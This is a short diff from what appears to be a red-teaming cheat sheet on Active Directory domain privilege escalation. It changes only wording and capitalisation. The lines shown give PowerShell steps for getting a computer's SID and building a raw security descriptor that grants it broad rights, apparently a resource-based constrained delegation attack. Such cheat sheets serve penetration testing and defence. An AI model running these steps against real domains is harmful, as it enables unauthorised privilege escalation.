0xJs/RedTeaming_CheatSheet/windows-ad/Domain-Privilege-Escalation.md

 #### Get the object SID
 - If already had a user with SPN use that user, otherwise use the computer you made!
 ```
-Get-DomainComputer fake01
+Get-DomainComputer FAKE01
 Get-DomainUser <USER>
 ```

 #### Creata a new raw security descriptor
-- Using the sid from previous command
+- Use the SID from previous command
 ```
 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)"
 $SDBytes = New-Object byte[] ($SD.BinaryLength)